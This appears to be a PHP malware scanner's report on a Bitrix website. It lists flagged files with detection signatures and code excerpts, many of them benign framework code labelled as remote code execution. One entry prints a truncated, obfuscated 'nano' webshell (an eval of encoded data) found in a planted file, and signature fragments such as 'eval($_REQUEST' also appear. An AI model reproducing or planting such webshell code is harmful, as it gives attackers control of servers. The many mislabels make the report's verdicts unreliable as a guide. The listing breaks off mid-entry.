Report

Version: 0.10.4
Scan date: 2024-03-04 15:46:35
Files analyzed: 17748 | Files infected: 306

/var/www/kievflotq/kievflot.ua/bitrix/index.php

Size: 83.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:42 Dangers: 1
DescriptionMatch

Sign 0f37c730 Line: 2 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/scripts/template.php

Size: 15.72 kB Created: 2017-05-21 22:21:52 Modified: 2023-06-30 13:57:55 Warns: 1
DescriptionMatch

Function eval Line: 462 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(response);
            }

            
CAjaxForm.prototype.ShowError = function(errorMessage)
            {
                var 
errorContainer document.getElementById("error_container");
                var 
errorText document.getElementById("error_text");
                if (!
errorContainer || !errorText)
                    return;

                var 
waitWindow document.getElementById("wait");
                if (
waitWindow)
                    
waitWindow.style.display "none";

                
errorContainer.style.display 'block';
                
errorText.innerHTML strip_tags(errorMessage);

                var 
retryButton = ...

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_private/download_private.php

Size: 3.71 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 127 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/404.php")

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_balance.php

Size: 3.00 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 47 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php")

Exploit execution Line: 95 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/404.php")

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download.php

Size: 2.09 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 36 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php")

Exploit execution Line: 69 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/404.php")

/var/www/kievflotq/kievflot.ua/bitrix/backup/index.php

Size: 80.00 B Created: 2017-06-11 00:13:59 Modified: 2023-06-30 13:57:47 Dangers: 1
DescriptionMatch

Sign 0f37c730 Line: 1 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.post.form/templates/.default/template.php

Size: 16.90 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:48 Dangers: 3
DescriptionMatch

Exploit execution Line: 117 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 14 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/file.php")

Exploit execution Line: 15 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/urlpreview.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.map/component.php

Size: 5.85 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 157 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } $search_child false$search_path ''$full_path ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) { $full_path $aMenu[1]; } else { $full_path trim(Rel2Abs(substr($PARENT_PATHstrlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos strrpos($full_path"/"); if ($slash_pos !== false) { $page substr($full_path$slash_pos+1); if(($pos strpos($page'?')) !== false$page substr($page,...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.link.list/component.php

Size: 1.14 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 19 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FN}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.interface.grid/component.php

Size: 9.39 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions$arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface""global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> ''$arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == ''$arResult["OPTIONS"...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/b24connector.button.list/ajax.php

Size: 3.73 kB Created: 2017-11-21 16:21:54 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/script.php

Size: 26.06 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function eval Line: 140 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/template.php

Size: 21.63 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 2
DescriptionMatch

Exploit execution Line: 270 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/editor.php")

Exploit execution Line: 79 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/micro/template.php

Size: 4.16 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 84 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.ui.grid/templates/.default/template.php

Size: 31.21 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:49 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
        var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
        var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
        var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);

        Grid = Grid ? Grid.instance : null;

        if (Grid)
        {
            Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
            Grid.arParams.MESSAGES = messages;

            if (action !== 'more')
            {
                Grid.arParams.EDITABLE_DATA ...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.filter/component.php

Size: 32.43 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 61 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.smart.filter/component.php

Size: 27.62 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 523 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.element/templates/old_version_16/template.php

Size: 40.01 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 708 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
            "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
            "
BASKET_URL" => $arParams["BASKET_URL"],
            "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
            "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
            "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
            "
USE_PRODUCT_QUANTITY" => 'N',
            "
OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
            "
CART_PROPERTIES_{...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.element/templates/.default/template.php

Size: 64.84 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1114 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                                '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                                '
BASKET_URL' => $arParams['BASKET_URL'],
                                '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                                '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                                '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                                '
USE_PRODUCT_QUANTITY' => 'N',
                                '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.user.link/component.php

Size: 19.17 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:49 Dangers: 1
DescriptionMatch

Exploit execution Line: 440 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$folderPath."/card.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.rules/lang/en/component.php

Size: 4.71 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Sign 407651f7 Line: 27 Dangerous

Malware Signature (hash: 407651f7)

warez

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.sections.top/component.php

Size: 19.13 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 180 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php

Size: 14.80 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php

Size: 31.88 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:48 Dangers: 3
DescriptionMatch

Exploit execution Line: 185 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

Exploit execution Line: 29 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

Exploit execution Line: 30 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/scripts_for_editor.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.new_blogs/.php

Size: 56.68 kB Created: 2017-05-21 22:21:47 Modified: 2024-02-21 05:07:06 Warns: 1 Dangers: 1
DescriptionMatch

Exploit nano Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y3]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y5] ($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[1]( " Q8s+l+NXDI9CN1Q0LfSoD1xXmJmSFpgBlmKsFl2noZ/HWCmmJ0zsIHsTuV6mSLbzgOhjSHgxY/5vvVSGhK4/shr/H3SKGZcYvDv8qJOww3c3Zwn1sohqayJa8cpjLa87PVrljxohgsPe/fsFb/pn9xcxv2Zc3oJ2Bn8A5EeoZl+TaOw0Nj2Uv2gYHuyvSQbjIPjrpkNKrxxWCtkjzftSWWLlpT9yuUriPZ4R6V8M9I/v7KF6fPpFPQPdFwVLaVB9fEfM8KvZPe3c3AMuDBruSujZxjz20EXBSKRapZOxyM229uEXHxmW8//KkszwSfo6bfqSzHUYnvwHTsDtwFHv4...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

EVaL ($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y3]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y5] ($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[1]( ""."
Q8s+l+NXDI9CN1Q0LfSoD1xXmJmSFpgBlmKsFl2noZ/HWCmmJ0zsIHsTuV6mSLbzgO" 
."hjSHgxY/5vvVSGhK4/shr/H3SKGZcYvDv8qJOww3c3Zwn1sohqayJa8cpjLa87PVrljxohgsPe/fsFb/pn9xcxv2Zc3oJ2Bn8A5EeoZl+TaOw0Nj2Uv2gYHuyvSQbjIPjrpkNKrxxWCtkjzftSWWLlpT9yuUriPZ4R6V8M9I/v7KF6fPpFPQPdFwVLaVB9fEfM8KvZPe3c3AMuDBruSujZxjz20EXBSKRapZOxyM2"."29uEXHxmW8//KkszwSfo6bfqS...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.popular_blogs/component.php

Size: 5.77 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog CBlog::GetByID($blogID); $arBlog CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list/templates/slider_big/template.php

Size: 16.32 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Warns: 1
DescriptionMatch

Function eval Line: 338 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" res[ii].href "');};");
        
res[ii].parentNode.insertBefore(divres[ii]);
        
res[ii].onmouseover = function()
        {
            
this.previousSibling.onshow();
            
this.bxMouseOver 'Y';
        };
        
res[ii].onmouseout = function()
        {
            
this.bxMouseOver 'N';
            var 
__this this;
            
setTimeout(
                function()
                {
                    if (
__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
                    {
                        
__this.previousSibling...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 19.20 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:49 Dangers: 2
DescriptionMatch

Exploit execution Line: 146 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 27 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php

Size: 12.64 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:49 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 110 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*width*/

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php

Size: 22.93 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function eval Line: 97 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php

Size: 23.20 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php

Size: 11.35 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php

Size: 20.56 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php

Size: 20.97 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.topic.list/component.php

Size: 23.88 kB Created: 2017-05-21 22:21:47 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 244 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php

Size: 9.46 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:49 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var result = " data "; "); }
            if (
result['status'] == 'inprogress')
            {
                
document.getElementById('photogallery_recalc').innerHTML result['text'];
                if (
__this_source.bReady == false)
                {
                    
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled true;
                }
                else
                {
                    
document.getElementById(...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 30.32 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/mobileapp.menu/templates/.default/template.php

Size: 12.57 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("showAuthForm");
                }
            }
    <?endif;
?>

    if(BX.PULL)
    {
        BX.addCustomEvent("onPullExtendWatch", function(data) {
            BX.PULL.extendWatch(data.id);
        });

        BX.addCustomEvent("thisPageWillDie", function(data) {
            BX.PULL.clearWatch(data.page_id);
        });

        BX.addCustomEvent("onPullEvent", function (module_id, command, params)
        {
            if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
            {
                //app.onCustomEvent('onPullOnline', {...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.topic.active/component.php

Size: 18.38 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 11 Warning

Double var technique is usually used for the obfuscation of malicious code

${$s}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/rss.show/component.php

Size: 2.52 kB Created: 2017-05-21 22:21:47 Modified: 2023-06-30 13:57:49 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('&$val, $key''$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT"array_walk_recursive($arResultcreate_function('&$val, $key''$val=str_replace(array("    ", "\\r\\n"), array("&nbsp;&nbsp;&nbsp;&nbsp;", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.comment/templates/.default/template.php

Size: 30.38 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 2
DescriptionMatch

Exploit execution Line: 152 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 20 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/bitrix/catalog.element/.default/template.php

Size: 40.07 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 713 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
            "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
            "
BASKET_URL" => $arParams["BASKET_URL"],
            "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
            "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
            "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
            "
USE_PRODUCT_QUANTITY" => 'N',
            "
OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
            "
CART_PROPERTIES_{...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section.php

Size: 2.44 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 76 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

